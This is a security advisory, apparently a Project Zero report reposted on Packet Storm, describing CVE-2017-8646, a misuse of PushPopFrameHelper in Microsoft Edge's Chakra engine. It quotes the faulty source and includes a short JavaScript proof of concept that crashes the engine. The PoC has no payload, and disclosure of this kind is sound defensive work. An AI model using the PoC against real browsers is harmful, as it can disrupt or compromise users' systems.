Microsoft Edge Chakra suffers from an incorrect usage of PushPopFrameHelper in InterpreterStackFrame::ProcessLinkFailedAsmJsModule.
53077803d9044bae974a778111a9fcaf6c3e820a11cbd47102da400e9b90b579 Microsoft Edge: Chakra: Incorrect usage of PushPopFrameHelper in InterpreterStackFrame::ProcessLinkFailedAsmJsModule
CVE-2017-8646
PushPopFrameHelper is a class that pushes the current stack frame object in its constructor and pops it in the destructor. So it should be used like "PushPopFrameHelper holder(...)", but InterpreterStackFrame::ProcessLinkFailedAsmJsModule uses it like a function.
Var InterpreterStackFrame::ProcessLinkFailedAsmJsModule()
{
...
PushPopFrameHelper(newInstance, _ReturnAddress(), _AddressOfReturnAddress());
...
}
It pushes "newInstance" and immediately pop it.
The PoC will crash in the following code.
void BailOutRecord::ScheduleLoopBodyCodeGen(Js::ScriptFunction * function, Js::ScriptFunction * innerMostInlinee, BailOutRecord const * bailOutRecord, IR::BailOutKind bailOutKind)
{
...
Js::InterpreterStackFrame * interpreterFrame = executeFunction->GetScriptContext()->GetThreadContext()->GetLeafInterpreterFrame(); <<-- Invalid stack frame object
loopHeader = executeFunction->GetLoopHeader(interpreterFrame->GetCurrentLoopNum()); <<-- interpreterFrame->GetCurrentLoopNum() == -1
...
}
PoC:
function asmModule() {
'use asm';
let a = [1, 2, 3, 4];
for (let i = 0; i < 0x100000; i++) { // JIT
a[0] = 1;
if (i === 0x30000) {
a[0] = {}; // the array type changed, bailout!!
}
}
function f(v) {
v = v | 0;
return v | 0;
}
return f;
}
asmModule(1);
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed